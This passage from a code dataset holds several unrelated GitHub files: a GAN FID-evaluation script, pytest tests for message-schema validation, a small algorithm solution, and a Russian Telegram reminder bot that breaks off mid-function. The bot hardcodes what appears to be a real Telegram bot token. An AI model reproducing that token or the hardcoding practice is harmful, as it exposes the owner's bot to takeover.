event\n\t\t:return:\n\t\t\"\"\"\n\t\t# check all entry variables for valid paths/exts\n\t\t# we do global check on variables so all input errors can be shown at once\n\t\tself.check_input()\n\t\tself.check_round()\n\t\tself.check_location()\n\t\tself.check_output()\n\t\t\n\t\t# ask if we're ready to be submitted\n\t\t# here we stack checks based on priority for report\n\t\t\n\t\t# for appendix, all input fields need to be filled out for report to run\n\t\tif self.check_input():\n\t\t\tif self.check_round():\n\t\t\t\tif self.check_location():\n\t\t\t\t\tif self.check_output():\n\t\t\t\t \t\tinput_path = os.path.join(self.input_entry.get())\n\t\t\t\t \t\tinput_round = int(self.round_menu.get())\n\t\t\t\t \t\tinput_location = self.state_dict.get(self.location_menu.get())\n\t\t\t\t \t\toutput_path = os.path.join(self.output_entry.get())\n\t\t\t\t \t\t# ask controller to run files\n\t\t\t\t \t\tself.controller.run_scores_topline(input_path, input_round, input_location, output_path)","repo_name":"scottriding/internbot","sub_path":"internbot/view/rnc_view/scores_topline_view/scores_topline_view.py","file_name":"scores_topline_view.py","file_ext":"py","file_size_in_byte":8950,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"27426993407","text":"import os\nimport pandas as pd\nimport torch\nfrom Data_loader import *\nfrom WGAN_models import WGAN\nfrom DCGAN_models import DCGAN\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sb\nfrom Dataset.CIFAR_dataloader import test_loader as cifar_test_loader\nimport torch\nfrom torchmetrics.image.fid import FrechetInceptionDistance\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n# fid = FrechetInceptionDistance().to(device)\nfid = FrechetInceptionDistance()\ndef get_fid(real_images, fake_images):\n '''\n Takes real image batch and generated 'fake' image batch\n Returns FID score, using the pytorch.metrics package\n '''\n # add 2 extra channels for MNIST (as required by InceptionV3\n if real_images.shape[1] != 3:\n real_images = torch.cat([real_images, real_images, real_images], 1)\n if fake_images.shape[1] != 3:\n fake_images = torch.cat([fake_images, fake_images, fake_images], 1)\n\n # if images not uint8 format, convert them (required format by fid model)\n if real_images.dtype != torch.uint8 or fake_images.dtype != torch.uint8:\n real_images = real_images.type(torch.ByteTensor)\n fake_images = fake_images.type(torch.ByteTensor)\n\n fid.update(real_images, real=True) # <--- currently running out of memory here\n fid.update(fake_images, real=False)\n return fid.compute().item()\n\n\ntrain_dataset = {\n \"CIFAR\":train_loader_cifar,\n \"MNIST\":train_loader_mnist,\n \"FashionMNIST\":train_loader_fashionmnist,\n}\n\ndef get_fid_score(dcgan = False, ResNet=False, gradient_penalty=False, spectral_norm=False, train_set='FashionMNIST', iter=0):\n if dcgan:\n GAN = DCGAN(ResNet=ResNet, train_set=train_set, iter=iter)\n epoch, iter, G_losses, fid_score, best_fid, Fake_losses, Real_losses = GAN.load_results()\n else:\n GAN = WGAN(ResNet=ResNet, gradient_penalty=gradient_penalty, spectral_norm=spectral_norm, train_set=train_set, iter=iter)\n epoch, iter, G_losses, fid_score, best_fid, Fake_losses, Real_losses = GAN.load_results()\n print(epoch)\n return np.array(fid_score).mean(), np.min(np.array(fid_score)), fid_score[-1], np.array(fid_score), \\\n np.array(G_losses), np.array(Real_losses), np.array(Fake_losses)\n\ndef get_fid_scores(model = 'DCGAN', dataset = 'MNIST', ii = 20):\n fid_scores_mean = []\n fid_scores_min = []\n fid_scores_last = []\n fid_scores = []\n G_losses = []\n Real_losses = []\n Fake_losses = []\n dcgan = False\n spectral_norm = False\n if model == 'DCGAN':\n dcgan = True\n if model == 'SN_WGAN':\n spectral_norm = True\n for i in range(ii):\n try:\n fid_score_mean, fid_score_min, fid_score_last, fid_score, G_loss, Real_loss, Fake_loss= get_fid_score(dcgan=dcgan, ResNet=False, gradient_penalty=False,\n spectral_norm=spectral_norm, train_set=dataset, iter=i)\n fid_scores_mean.append(fid_score_mean)\n fid_scores_min.append(fid_score_min)\n fid_scores_last.append(fid_score_last)\n fid_scores.append(fid_score[:50])\n G_losses.append(G_loss)\n Real_losses.append(Real_loss)\n Fake_losses.append(Fake_loss)\n except:\n pass\n fid_scores_mean = np.array(fid_scores_mean)\n fid_scores_min = np.array(fid_scores_min)\n fid_scores_last = np.array(fid_scores_last)\n fid_scores = np.array(fid_scores)\n G_losses = np.array(G_losses)\n Real_losses = np.array(Real_losses)\n Fake_losses = np.array(Fake_losses)\n MKDIR(\"Figure\")\n MKDIR(\"Figure/\"+model+\"/\")\n MKDIR(\"Figure/\"+model+\"/\"+dataset+\"/\")\n np.save(\"Figure/\"+model+\"/\"+dataset+\"/fid_scores_mean.npy\", fid_scores_mean)\n np.save(\"Figure/\"+model+\"/\"+dataset+\"/fid_scores_min.npy\", fid_scores_min)\n np.save(\"Figure/\" + model + \"/\" + dataset + \"/fid_scores_last.npy\", fid_scores_last)\n np.save(\"Figure/\" + model + \"/\" + dataset + \"/fid_scores.npy\", fid_scores)\n np.save(\"Figure/\" + model + \"/\" + dataset + \"/G_losses.npy\", G_losses)\n np.save(\"Figure/\" + model + \"/\" + dataset + \"/Real_losses.npy\", Real_losses)\n np.save(\"Figure/\" + model + \"/\" + dataset + \"/Fake_losses.npy\", Fake_losses)\n\ndef save_results():\n models = ['DCGAN', 'WGAN', 'SN_WGAN']\n train_sets = ['CIFAR', 'MNIST', 'FashionMNIST']\n for model in models:\n for train_set in train_sets:\n get_fid_scores(model, train_set)\n\ndef show_fid_score(train_set='CIFAR', iter=40000):\n ii = int(iter / 200)\n path = \"Figure/\"+'SN_WGAN'+\"/\"+train_set+\"/\"+\"/fid_scores.npy\"\n snwgan_fid = np.load(path, allow_pickle=True)\n snwgan_fid = snwgan_fid.mean(axis=0)[:ii]\n path = \"Figure/\" + 'WGAN' + \"/\" + train_set + \"/\" + \"/fid_scores.npy\"\n wgan_fid = np.load(path, allow_pickle=True)\n wgan_fid = wgan_fid.mean(axis=0)[:ii]\n path = \"Figure/\" + 'DCGAN' + \"/\" + train_set + \"/\" + \"/fid_scores.npy\"\n dcgan_fid = np.load(path, allow_pickle=True)\n dcgan_fid = dcgan_fid.mean(axis=0)[:ii]\n x1 = np.linspace(0, iter, ii)\n y1 = snwgan_fid\n l1 = plt.plot(x1, y1, 'b--', label='Spectral Normalization WGAN')\n x2 = np.linspace(0, iter, ii)\n y2 = wgan_fid\n l2 = plt.plot(x2, y2, 'g--', label='WGAN')\n x3 = np.linspace(0, iter, ii)\n y3 = dcgan_fid\n l3 = plt.plot(x3, y3, 'r--', label='DCGAN')\n plt.title('FID scores')\n plt.xlabel('iteration')\n plt.ylabel('fid score')\n plt.legend()\n plt.show()\n\ndef show_Generator_Losses(dcgan = True, gradient_penalty=False, spectral_norm=False, train_set='CIFAR', iter=0):\n title = ''\n path = \"Figure/\"\n if dcgan:\n title += \"DCGAN \"\n model = \"DCGAN/\"\n else:\n title += \"WGAN \"\n model = \"WGAN/\"\n if spectral_norm:\n title = \"Spectral Norm \" + title\n model = \"SN_\" + model\n if gradient_penalty:\n title = \"Gradient Penalty \" + title\n path += model + train_set + '/' + \"G_losses.npy\"\n G_losses = np.load(path, allow_pickle=True)[iter]\n if train_set == \"CIFAR\":\n iter = 40000\n else:\n iter = 10000\n # Generator loss\n x1 = np.linspace(0, iter, G_losses.shape[0])\n y1 = np.array(G_losses)\n g_loss = plt.plot(x1, y1, 'r--', label='Generator Loss')\n plt.title(title + 'Generator Loss')\n plt.xlabel('iteration')\n plt.ylabel('Generator Loss')\n plt.legend()\n plt.show()\n\ndef show_Discriminator_Losses(dcgan = False, gradient_penalty=False, spectral_norm=True, train_set='CIFAR', iter=0):\n title = ''\n path = \"Figure/\"\n if dcgan:\n title += \"DCGAN \"\n model = \"DCGAN/\"\n else:\n title += \"WGAN \"\n model = \"WGAN/\"\n if spectral_norm:\n title = \"Spectral Norm \" + title\n model = \"SN_\" + model\n if gradient_penalty:\n title = \"Gradient Penalty \" + title\n path += model + train_set + '/'\n Fake_losses = np.load(path + \"Fake_losses.npy\", allow_pickle=True)[iter]\n Real_losses = np.load(path + \"Real_losses.npy\", allow_pickle=True)[iter]\n if train_set == \"CIFAR\":\n iter = 40000\n else:\n iter = 10000\n # Discriminator loss\n x2 = np.linspace(0, iter, Fake_losses.shape[0])\n y2 = np.array(Fake_losses)\n fake_loss = plt.plot(x2, y2, 'b--', label='Fake loss')\n x3 = np.linspace(0, iter, Real_losses.shape[0])\n y3 = np.array(Real_losses)\n real_loss = plt.plot(x3, y3, 'g--', label='Real loss')\n x4 = np.linspace(0, iter, Real_losses.shape[0])\n y4 = np.array(Real_losses) + np.array(Fake_losses)\n real_loss = plt.plot(x4, y4, 'm--', label='Discriminator loss')\n plt.title(title + 'Discriminator Loss')\n plt.xlabel('iteration')\n plt.ylabel('Discriminator Loss')\n plt.legend()\n plt.show()\n\n\ndef MKDIR(path):\n try:\n os.mkdir(path)\n except:\n pass\n\ndef get_best_model(train_set='FashionMNIST', iters=20):\n best_fid = 1e8\n which_GAN = \"DCGAN\"\n fid_dict = {}\n for i in range(iters):\n GAN = DCGAN(ResNet=False, train_set=train_set, iter=i)\n try:\n GAN.load()\n fid_dict[\"DCGAN_\"+train_set+\"{}\".format(i)] = GAN.best_fid\n if GAN.best_fid < best_fid:\n best_GAN = GAN\n best_fid = GAN.best_fid\n print(best_fid)\n which_GAN = \"DCGAN_\"+train_set+\"{}\".format(i)\n except:\n pass\n for i in range(iters):\n GAN = WGAN(ResNet=False, spectral_norm=False, train_set=train_set, iter=i)\n try:\n GAN.load()\n fid_dict[\"WGAN_\"+train_set+\"{}\".format(i)] = GAN.best_fid\n if GAN.best_fid < best_fid:\n best_GAN = GAN\n best_fid = GAN.best_fid\n print(best_fid)\n which_GAN = \"WGAN_\"+train_set+\"{}\".format(i)\n except:\n pass\n for i in range(iters):\n GAN = WGAN(ResNet=False, spectral_norm=True,\n train_set=train_set, iter=i)\n try:\n GAN.load()\n fid_dict[\"SN_WGAN_\"+train_set+\"{}\".format(i)] = GAN.best_fid\n if GAN.best_fid < best_fid:\n best_GAN = GAN\n best_fid = GAN.best_fid\n print(best_fid)\n which_GAN = \"SN_WGAN_\"+train_set+\"{}\".format(i)\n except:\n pass\n fid_dict[\"best_model\"] = which_GAN\n df = pd.DataFrame(fid_dict, index=[0])\n df.to_csv(train_set + \"_fid_results.csv\")\n\n return best_GAN, which_GAN, fid_dict\n\ndef get_results():\n d = {}\n root = 'checkpoint/'\n ganname = ['DCGAN_', 'WGAN_', 'WGAN_GP_', 'SN_WGAN_']\n dataset = ['MNIST_', 'FashionMNIST_', 'CIFAR_']\n for data in dataset:\n for gan in ganname:\n gan_ = []\n for i in range(10):\n path = root + gan + data + str(int(i)) + '/'\n checkpoint_G = torch.load(path + \"G.pth\")\n gan_.append(checkpoint_G[\"Best FID score\"])\n d[data+gan] = gan_\n df = pd.DataFrame(data=d)\n df.to_csv('results_fid.csv')\n\nif __name__ == '__main__':\n show_fid_score(train_set=\"CIFAR\", iter=40000)","repo_name":"Karl-Liu-ch/Pytorch_WGAN","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":10070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26613193023","text":"n = int(input())\nMOD = 998244353\n\nif n == 1:\n print(9)\n exit()\n\n\ncnt = 9\nfor i in range(1, n):\n sita = 2 ** (i - 1)\n ue = cnt - sita\n\n cnt = ue * 3 + sita * 2\n cnt %= MOD\n\nprint(cnt)\n","repo_name":"mei28/Competitive-programing","sub_path":"ABC-242/C_1.py","file_name":"C_1.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13896756019","text":"from unittest.mock import patch\n\nimport pytest\nfrom rest_framework import serializers\n\nfrom zconnect._messages.message import Message\nfrom zconnect._messages.schemas import verify_message_schema\nfrom zconnect.util import exceptions\n\n\nclass BadDeserializer(serializers.Serializer):\n a_missing_field = serializers.CharField()\n\n\nclass GoodDeserializer(serializers.Serializer):\n test_int = serializers.IntegerField()\n test_string = serializers.CharField()\n\n\n@pytest.fixture(name=\"test_message\")\ndef fix_test_message(fakedevice):\n fakedevice.product.state_serializer_name = \"coolserializer\"\n fakedevice.product.save()\n\n message = Message(\n category=\"test_message\",\n body={\n \"state\": {\n \"reported\": {\n \"test_int\": 123,\n \"test_string\": \"abc\",\n }\n }\n },\n device=fakedevice,\n )\n\n return message\n\n\nclass TestVerifySchema:\n\n def test_no_state_error(self, test_message):\n \"\"\"no 'state' in message raises an error, independent of verifier being used or not\"\"\"\n test_message.body = {\"hello\": \"test\"}\n\n with pytest.raises(exceptions.BadMessageSchemaError):\n verify_message_schema(test_message)\n\n def test_no_reported_error(self, test_message):\n \"\"\"no 'reported' in message state raises an error, independent of verifier being used or not\"\"\"\n test_message.body[\"state\"] = {\"hello\": \"test\"}\n\n with pytest.raises(exceptions.BadMessageSchemaError):\n verify_message_schema(test_message)\n\n def test_no_verifier_works(self, fakeproduct, test_message):\n \"\"\"No verifier set on the product\"\"\"\n\n fakeproduct.state_serializer_name = \"\"\n fakeproduct.save()\n\n verify_message_schema(test_message)\n\n # hack test\n with patch(\"zconnect._messages.schemas.logger.warning\", side_effect=NotImplementedError):\n with pytest.raises(NotImplementedError):\n verify_message_schema(test_message)\n\n @pytest.mark.parametrize(\"loc\", (\n # various valid entry points that all point to nonexistent things\n \"ofkpofkw3\",\n \"o3ko.omhoote\",\n \"o3ko.omhoote:abc\",\n ))\n def test_invalid_verifier_raises(self, fakeproduct, test_message, loc):\n \"\"\"Invalid callable used for product verifier name\"\"\"\n fakeproduct.state_serializer_name = loc\n fakeproduct.save()\n\n with pytest.raises(exceptions.BadMessageSchemaError) as e:\n verify_message_schema(test_message)\n\n assert \"Error loading schema\" in str(e.value)\n\n def test_with_verifier_wrong_serializer(self, test_message):\n \"\"\"Mock loading verifier which raises a validation error because the serializer is wrong\"\"\"\n\n with patch(\"zconnect._messages.schemas.import_callable\", return_value=BadDeserializer):\n with pytest.raises(exceptions.BadMessageSchemaError):\n verify_message_schema(test_message)\n\n def test_with_verifier_wrong_data(self, test_message):\n \"\"\"Same, but the data is wrong\"\"\"\n\n test_message.body[\"state\"][\"reported\"] = {\n \"a\": \"b\",\n }\n\n with patch(\"zconnect._messages.schemas.import_callable\", return_value=GoodDeserializer):\n with pytest.raises(exceptions.BadMessageSchemaError):\n verify_message_schema(test_message)\n\n def test_with_verifier_success(self, test_message):\n \"\"\"Correct deserializer + data format\"\"\"\n\n with patch(\"zconnect._messages.schemas.import_callable\", return_value=GoodDeserializer):\n verify_message_schema(test_message)\n\n def test_nested_validate(self, test_message):\n \"\"\"Nested deserialization\"\"\"\n\n class OuterSerializer(serializers.Serializer):\n data = GoodDeserializer(required=True)\n tag = serializers.CharField()\n\n test_message.body[\"state\"][\"reported\"] = {\n \"tag\": \"chocolate\",\n \"data\": test_message.body[\"state\"][\"reported\"],\n }\n\n with patch(\"zconnect._messages.schemas.import_callable\", return_value=OuterSerializer):\n verify_message_schema(test_message)\n","repo_name":"zconnect-iot/zconnect-django","sub_path":"tests/brokers/test_schema_validation.py","file_name":"test_schema_validation.py","file_ext":"py","file_size_in_byte":4182,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"29044708389","text":"#модули\r\nimport telebot\r\nfrom telebot import types\r\nimport time\r\nimport sqlite3\r\nbot = telebot.TeleBot('5348582930:AAE2KdROhTqjD7LoFlt5OSPtIDkn7l5jbW0')\r\n#вспомогательные массивы\r\nmsup=['/min','/day','/hour']\r\nm1sup=['/n','/notify']\r\nsup=[2,3,4]\r\nsup2=[5,6,7,8,9,0]\r\n\r\ndef error_format(message):\r\n\tbot.send_message(message.chat.id,'❌ Ошибка. Проверьте формат вашего напоминания! ❌ Формат: \\n'\r\n\t\t\t\t\t\t\t\t\t '\\n'\r\n\t\t\t\t\t\t\t\t\t 'Напомни/напомнить/напоминание *ваш текст напоминания* через *число* единица измерения (час/день/минута)')\r\n\r\n#фильтры\r\nsymbols = [0,1,2,3,4,5,6,7,8,9,'0','1','2','3','4','5','6','7','8','9']\r\nalter=['напомни','напомнить','напоминание']\r\nhours=['час','часов','часа']\r\nmins=['минута','минут','минуты']\r\ndays=['день','дня','дни']\r\n#коннект к базе данных\r\n\r\nconn = sqlite3.connect('database.db',check_same_thread=False)\r\ncursor = conn.cursor()\r\n\r\n#работа с базой данных\r\n\r\ndef db_table_val(us_id,text):\r\n cursor.execute('INSERT INTO test (us_id, text) VALUES (?, ?)',\r\n (us_id,text))\r\n conn.commit()\r\n\r\ndef sql_carry(us_id, text):\r\n\tcheck = cursor.execute('SELECT * FROM test WHERE us_id=?', (us_id,))\r\n\tif check.fetchone() is None:\r\n\t\tdb_table_val(us_id, text)\r\n\telse:\r\n\t\tdelete = \"\"\"DELETE from test where us_id = ?\"\"\"\r\n\t\tcursor.execute(delete, (us_id,))\r\n\t\tconn.commit()\r\n\t\tdb_table_val(us_id, text)\r\n\r\n#начало работы бота\r\n@bot.message_handler(commands=['start'])\r\ndef welcome(message):\r\n\tmenu=types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n\tmenu1=types.KeyboardButton('⏱ Создать напоминание')\r\n\tmenu2 = types.KeyboardButton('⚙ Помощь по боту')\r\n\tmenu.add(menu1,menu2)\r\n\tbot.send_message(message.chat.id, '✉ Вас приветствует NotifyBot (бот-напоминание) ✉\\n', reply_markup=menu)\r\n\r\n#информация о боте\r\n@bot.message_handler(commands=['info'])\r\ndef help(message):\r\n\tbot.send_message(message.chat.id, '❓ Для того чтобы создать уведомление: \\n1) Введите команду /n или нажмите на кнопку клавиатуры \"Создать напоминание\" или используйте быстрое напоминание и введите данные о своем уведомлении в формате:\\n'\r\n\t\t\t\t\t\t\t\t\t '\\n'\r\n\t\t\t\t\t\t\t\t\t 'Напомни/напомнить/напоминание *ваш текст напоминания* через *число* единица измерения (минута/час/день). \\n'\r\n\t\t\t\t\t\t\t\t\t '\\n'\r\n\t\t\t\t\t\t\t\t\t '2)Введите текст уведомления. \\n3)Выберите единицу измерения. \\n4)Укажите количество минут/часов/дней. \\n'\r\n\t\t\t\t\t\t\t\t\t 'Команды бота: /info ; /start ; /n ')\r\n#создать уведомление 1 способ\r\n@bot.message_handler(commands=['n'])\r\ndef request_0(message):\r\n\tbot.send_message(message.chat.id, '🗒 О чем напомнить?')\r\n\tbot.register_next_step_handler(message,request)\r\n\r\n@bot.message_handler(content_types=['document','audio','photo'])\r\ndef error_type(message):\r\n\tbot.send_message(message.chat.id,'Я вас не понимаю! 😔 Список команд бота: /info ; /start ; /n')\r\n\r\n@bot.message_handler(content_types=['text'])\r\ndef message_handler(message):\r\n\tmes=message.text.split(' ')\r\n\tif message.text == '⏱ Создать напоминание':\r\n\t\trequest_0(message)\r\n\telif message.text == '⚙ Помощь по боту':\r\n\t\thelp(message)\r\n\telif mes[0].lower() in alter:\r\n\t\tif 'через' not in mes:\r\n\t\t\terror_format(message)\r\n\t\telif mes.index('через')==len(mes)-1:\r\n\t\t\terror_format(message)\r\n\t\telse:\r\n\t\t\thours = ['час', 'часов', 'часа']\r\n\t\t\tmins = ['минута', 'минут', 'минуты', 'минуту']\r\n\t\t\tdays = ['день', 'дня', 'дни']\r\n\t\t\tus_id = message.from_user.id\r\n\t\t\ttext=''\r\n\t\t\tmes.remove(mes[0])\r\n\t\t\tnum=mes.index('через')\r\n\t\t\tif num+1==len(mes)-1:\r\n\t\t\t\terror_format(message)\r\n\t\t\telif mes[num+2] not in days and mes[num+2] not in mins and mes[num+2] not in hours:\r\n\t\t\t\terror_format(message)\r\n\t\t\telse:\r\n\t\t\t\tfor i in range(0,num):\r\n\t\t\t\t\ttext=text+' '+mes[i]\r\n\t\t\t\t\tsql_carry(us_id,text)\r\n\t\t\t\tfor i in range(num+1,len(mes)):\r\n\t\t\t\t\thours = ['час', 'часов', 'часа']\r\n\t\t\t\t\tmins = ['минута', 'минут', 'минуты','минуту']\r\n\t\t\t\t\tdays = ['день', 'дня', 'дни']\r\n\t\t\t\t\tif mes[i] in hours:\r\n\t\t\t\t\t\tdef hours_alter(mes,num):\r\n\t\t\t\t\t\t\tfor i in range(num+1,len(mes)):\r\n\t\t\t\t\t\t\t\tif mes[num+1] in symbols or int(mes[num+1])%10 in symbols:\r\n\t\t\t\t\t\t\t\t\tkolvo_=int(mes[num+1])\r\n\t\t\t\t\t\t\t\t\tus_id = message.from_user.id\r\n\t\t\t\t\t\t\t\t\tfor value in cursor.execute('SELECT * FROM test WHERE us_id=?', (us_id,)):\r\n\t\t\t\t\t\t\t\t\t\treqq = value[1]\r\n\t\t\t\t\t\t\t\t\tif kolvo_ == 1:\r\n\t\t\t\t\t\t\t\t\t\tend = 'час'\r\n\t\t\t\t\t\t\t\t\telif kolvo_ in sup:\r\n\t\t\t\t\t\t\t\t\t\tend = 'часа'\r\n\t\t\t\t\t\t\t\t\telif kolvo_ > 4 and kolvo_ < 20 or kolvo_ // 10 > 1 and kolvo_ % 10 in sup2:\r\n\t\t\t\t\t\t\t\t\t\tend = 'часов'\r\n\t\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\t\tend = 'часов'\r\n\t\t\t\t\t\t\t\t\tbot.send_message(message.chat.id,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t '💬 Напоминание успешно создано. Я напомню вам о' + str(reqq) + ' через ' + str(kolvo_) + ' ' + str(\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t end) + '!')\r\n\t\t\t\t\t\t\t\t\ttime.sleep(kolvo_ * 60 * 60)\r\n\t\t\t\t\t\t\t\t\tbot.send_message(message.chat.id, text='🔔 Время для' + reqq + '!')\r\n\t\t\t\t\t\t\t\t\tbreak\r\n\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\terror_format(message)\r\n\t\t\t\t\t\t\t\t\tbreak\r\n\t\t\t\t\t\thours_alter(mes, num)\r\n\t\t\t\t\telif mes[i] in mins:\r\n\t\t\t\t\t\tdef mins_alter(mes,num):\r\n\t\t\t\t\t\t\tfor i in range(num+1,len(mes)):\r\n\t\t\t\t\t\t\t\tif mes[num+1] in symbols or int(mes[num+1])%10 in symbols:\r\n\t\t\t\t\t\t\t\t\tkolvo_=int(mes[num+1])\r\n\t\t\t\t\t\t\t\t\tus_id = message.from_user.id\r\n\t\t\t\t\t\t\t\t\tfor value in cursor.execute('SELECT * FROM test WHERE us_id=?', (us_id,)):\r\n\t\t\t\t\t\t\t\t\t\treqq = value[1]\r\n\t\t\t\t\t\t\t\t\tif kolvo_ == 1:\r\n\t\t\t\t\t\t\t\t\t\tend = 'минуту'\r\n\t\t\t\t\t\t\t\t\telif kolvo_ in sup:\r\n\t\t\t\t\t\t\t\t\t\tend = 'минуты'\r\n\t\t\t\t\t\t\t\t\telif kolvo_ > 4 and kolvo_ < 20 or kolvo_ // 10 > 1 and kolvo_ % 10 in sup2:\r\n\t\t\t\t\t\t\t\t\t\tend = 'минут'\r\n\t\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\t\tend = 'минуты'\r\n\t\t\t\t\t\t\t\t\tbot.send_message(message.chat.id,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t '💬 Напоминание успешно создано. Я напомню вам о' + str(reqq) + ' через ' + str(kolvo_) + ' ' + str(\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t end) + '!')\r\n\t\t\t\t\t\t\t\t\ttime.sleep(kolvo_ * 60)\r\n\t\t\t\t\t\t\t\t\tbot.send_message(message.chat.id, text='🔔 Время для' + reqq + '!')\r\n\t\t\t\t\t\t\t\t\tbreak\r\n\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\terror_format(message)\r\n\t\t\t\t\t\t\t\t\tbreak\r\n\t\t\t\t\t\tmins_alter(mes,num)\r\n\t\t\t\t\telif mes[i] in days:\r\n\t\t\t\t\t\tdef days_alter(mes,num):\r\n\t\t\t\t\t\t\tfor i in range(num + 1, len(mes)):\r\n\t\t\t\t\t\t\t\tif mes[num + 1] in symbols or int(mes[num+1])%10 in symbols:\r\n\t\t\t\t\t\t\t\t\tkolvo_ = int(mes[num + 1])\r\n\t\t\t\t\t\t\t\t\tus_id = message.from_user.id\r\n\t\t\t\t\t\t\t\t\tfor value in cursor.execute('SELECT * FROM test WHERE us_id=?', (us_id,)):\r\n\t\t\t\t\t\t\t\t\t\treqq = value[1]\r\n\t\t\t\t\t\t\t\t\tif kolvo_ == 1:\r\n\t\t\t\t\t\t\t\t\t\tend = 'день'\r\n\t\t\t\t\t\t\t\t\telif kolvo_ in sup:\r\n\t\t\t\t\t\t\t\t\t\tend = 'дня'\r\n\t\t\t\t\t\t\t\t\telif kolvo_ > 4 and kolvo_ < 20 or kolvo_ // 10 > 1 and kolvo_ % 10 in sup2:\r\n\t\t\t\t\t\t\t\t\t\tend = 'дней'\r\n\t\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\t\tend = 'дней'\r\n\t\t\t\t\t\t\t\t\tbot.send_message(message.chat.id,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t '💬 Напоминание успешно создано. Я напомню вам о' + str(reqq) + ' через ' + str(kolvo_) + ' ' + str(\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t end) + '!')\r\n\t\t\t\t\t\t\t\t\ttime.sleep(kolvo_ * 60 * 24 * 60)\r\n\t\t\t\t\t\t\t\t\tbot.send_message(message.chat.id, text='🔔 Время для' + reqq + '!')\r\n\t\t\t\t\t\t\t\t\tbreak\r\n\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\terror_format(message)\r\n\t\t\t\t\t\t\t\t\tbreak\r\n\t\t\t\t\t\tdays_alter(mes,num)\r\n\telse:\r\n\t\tbot.send_message(message.chat.id,'Я вас не понимаю! 😔 Список команд бота: /info ; /start ; /n')\r\n\r\ndef request(message):\r\n\r\n\t#получение текста уведомления и отправка его в базу данных\r\n\r\n\treq_ = message.text\r\n\ttext = req_\r\n\tus_id = message.from_user.id\r\n\tsql_carry(us_id,text)\r\n\r\n\t#фильтр на команды\r\n\r\n\tif req_=='/start':\r\n\t\twelcome(message)\r\n\telif req_ in m1sup:\r\n\t\trequest_0(message)\r\n\telif req_=='⚙ Помощь по боту' or req_=='/info':\r\n\t\thelp(message)\r\n\telif req_=='⏱ Создать напоминание':\r\n\t\trequest_0(message)\r\n\telse:\r\n\t\tkeyboard_(message)\r\n\t\t# вывод клавиатуры\r\ndef keyboard_(message):\r\n\tkeyboard_1 = '🕒 Выберите единицу времени:'\r\n\tkeyboard = types.InlineKeyboardMarkup()\r\n\tkey_hour = types.InlineKeyboardButton(text='Минуты', callback_data='min')\r\n\tkey_min = types.InlineKeyboardButton(text='Часы', callback_data='hour')\r\n\tkey_day = types.InlineKeyboardButton(text='Дни', callback_data='days')\r\n\tkeyboard.add(key_min, key_hour, key_day)\r\n\tbot.send_message(message.chat.id, text=keyboard_1, reply_markup=keyboard)\r\n\r\n\r\n#определение единицы измерения исходя из call.data\r\n\r\n@bot.callback_query_handler(func=lambda call: True)\r\ndef choose_1(call):\r\n\tif call.data=='min':\r\n\t\tbot.send_message(call.message.chat.id,'Введите целое количество минут.')\r\n\t\tbot.register_next_step_handler(call.message, mins)\r\n\telif call.data=='hour':\r\n\t\tbot.send_message(call.message.chat.id,'Введите целое количество часов.')\r\n\t\tbot.register_next_step_handler(call.message, hour)\r\n\telif call.data == 'days':\r\n\t\tbot.send_message(call.message.chat.id, 'Введите целое количество дней.')\r\n\t\tbot.register_next_step_handler(call.message, day)\r\n#основная часть - бот засыпает на определенное время\r\ndef mins(call):\r\n\ttext = call.text\r\n\tfor i in text:\r\n\t\tif i not in symbols:\r\n\t\t\tdef error(message):\r\n\t\t\t\tbot.send_message(message.chat.id, '❌ Ошибка. Введите целое количество минут. ❌')\r\n\t\t\t\tkeyboard_(message)\r\n\t\t\terror(call)\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\tmins_1(call)\r\n\t\t\tbreak\r\ndef mins_1(call):\r\n\tus_id=call.from_user.id\r\n\tfor value in cursor.execute('SELECT * FROM test WHERE us_id=?', (us_id,)):\r\n\t\treqq=value[1]\r\n\ttext = call.text\r\n\tif text=='1':\r\n\t\tend='минуту'\r\n\telif int(text) in sup:\r\n\t\tend='минуты'\r\n\telif int(text)>4 and int(text)<20 or int(text)//10>1 and int(text)%10 in sup2:\r\n\t\tend='минут'\r\n\telse:\r\n\t\tend='минуты'\r\n\tkolvo=int(text)\r\n\tbot.send_message(call.chat.id, '💬 Напоминание успешно создано. Я напомню вам о '+str(reqq)+' через '+str(kolvo)+' '+str(end)+'!')\r\n\ttime.sleep(kolvo*60)\r\n\tbot.send_message(call.chat.id,text='🔔 Время для '+reqq+'!')\r\n\r\n\r\ndef hour(call):\r\n\talpha = [chr(ord(\"А\") + i) for i in range(32)]\r\n\talpha1 = [chr(i) for i in range(65, 91)]\r\n\ttext = call.text\r\n\tfor i in text:\r\n\t\tif i.upper() in alpha or i.upper() in alpha1:\r\n\t\t\tdef error(message):\r\n\t\t\t\tbot.send_message(message.chat.id, '❌ Ошибка. Введите целое количество часов. ❌')\r\n\t\t\t\tkeyboard_(message)\r\n\t\t\terror(call)\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\thour_1(call)\r\n\t\t\tbreak\r\ndef hour_1(call):\r\n\tus_id=call.from_user.id\r\n\tfor value in cursor.execute('SELECT * FROM test WHERE us_id=?', (us_id,)):\r\n\t\treqq=value[1]\r\n\ttext = call.text\r\n\tif text == 